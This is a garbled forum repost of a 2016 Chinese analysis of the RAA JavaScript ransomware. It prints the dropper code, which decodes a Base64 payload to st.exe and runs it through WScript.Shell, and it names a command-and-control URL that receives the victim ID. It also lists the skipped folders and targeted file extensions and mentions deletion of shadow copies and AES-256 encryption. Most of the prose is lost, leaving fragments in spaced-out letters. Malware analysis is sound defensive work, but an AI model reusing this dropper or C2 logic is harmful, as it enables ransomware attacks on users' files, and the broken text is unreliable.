[10354] 2016-07-30_一个纯JS脚本的文档敲诈者剖析(附解密工具)

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2016-07-30_一个纯JS脚本的文档敲诈者剖析(附解密工具) J S   F r e e B u f   2 0 1 6 - 0 7 - 3 0 0 x 0 0   R A A J S J S J S R A A < > 0 x 0 1   0 x 0 1   1 J S M y   D o c u m e n t s d o c _ a t t a c h e d _ *
2 e x e J S e x e e x e e x e e x e v a r   f l o   =   n e w   A c t i v e X O b j e c t   ( " A D O D B . S t r e a m " ) ; v a r   r u n e r   =   W S c r i p t . C r e a t e O b j e c t ( " W S c r i p t . S h e l l " ) ; v a r   w h e r   =   r u n e r . S p e c i a l F o l d e r s ( " M y D o c u m e n t s " ) ; w h e r   =   w h e r   +   " "   +   " s t . e x e " ; f l o . C h a r S e t   =   " 4 3 7 " ; f l o . O p e n ( ) ; v a r   p n y   =   d a t a _ p n . r e p l a c e ( / N M S I O P / g ,   " A " ) ; v a r   p n y _ a r   =   C r y p t o J S . e n c . B a s e 6 4 . p a r s e ( p n y ) ;
v a r   p n y _ d e c   =   p n y _ a r . t o S t r i n g ( C r y p t o J S . e n c . U t f 8 ) ; f l o . P o s i t i o n   =   0 ; f l o . S e t E O S ; f l o . W r i t e T e x t ( p n y _ d e c ) ; f l o . S a v e T o F i l e ( w h e r ,   2 ) ; f l o . C l o s e ; w h e r   =   " " "   +   w h e r   +   " " " ; r u n e r . R u n ( w h e r ) ;   3 H K C U R A A R a a - f n l   4
5 V S S 使 6 I D H K C U R A A R a a - I D  
7 I D   -   R A A u r l h * * p : / /   d a t a g i v e r d . c o m / m a r s 9 . p h p ? i d = X X X X X X X X X     R A A G E T 8 便 W I N D O W S ,   R E C Y L E R ,   P r o g r a m   F i l e s ,   P r o g r a m   F i l e s   ( x 8 6 ) ,   W i n d o w s ,   R e c y c l e . B i n ,   R e c y c l e r ,   T E M P ,   A P P D A T A ,   A p p D a t a ,   T e m p , P r o g r a m D a t a ,   M i c r o s o f t
9 . l o c k e d ~ $ 便 . d o c ,   . x l s ,   . r t f ,   . p d f ,   . d b f ,   . j p g ,   . d w g ,   . c d r ,   . p s d ,   . c d ,   . m d b ,   . p n g ,   . l c d ,   . z i p ,   . r a r ,   . c s v 1 0 . l o c k e d 1 2 3 . j p g 1 2 3 . j p g . l o c k e d
1 1 H K C U R A A R a a - f n l b e e n F i n i s h e d C ! ! ! R E A D M E ! ! ! * . r t f 0 x 0 2   A E S - 2 5 6 1   h * * p : / /   d a t a g i v e r d . c o m / m a r s 9 . p h p ? i d = X X X X X X X X X     R A A 2 0 0 0
2   3 2 0 - 2 0 0 0   A A 2 0 0 0 3 2 B B I V
3   4 6 K - 5 M 5 M - 5 0 0 M 6 K 5 0 0 M I D N U M = [ I D ] K E Y _ L O G I C = [ K E Y _ L ] I V _ L O G I C = [ I V _ L ] L O G I C _ I D = [ N U M B E R ]   I D N U M I D   K E Y _ L O G I C   I V _ L O G I C   L O G I C _ I D
1 6 K - 5 M L O G I C _ I D = 1 [ 2 0 0 0 ,   2 0 4 0 ] n 5 d a t a d a t a [ 0 ] [ 0 ] d a t a [ 1 ] [ 0 ] d a t a [ 0 ] [ 1 ] d a t a [ 1 ] [ 1 ] d a t a [ 0 ] [ 2 ] d a t a [ 0 ] d a t a [ 0 ] [ 0 ] d a t a [ 0 ] [ 1 ] d a t a [ 0 ] [ 2 ] = E N D = O F = H E A D E R = d a t a [ 1 ] d a t a [ 1 ] [ 0 ] d a t a [ 1 ] [ 1 ]
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则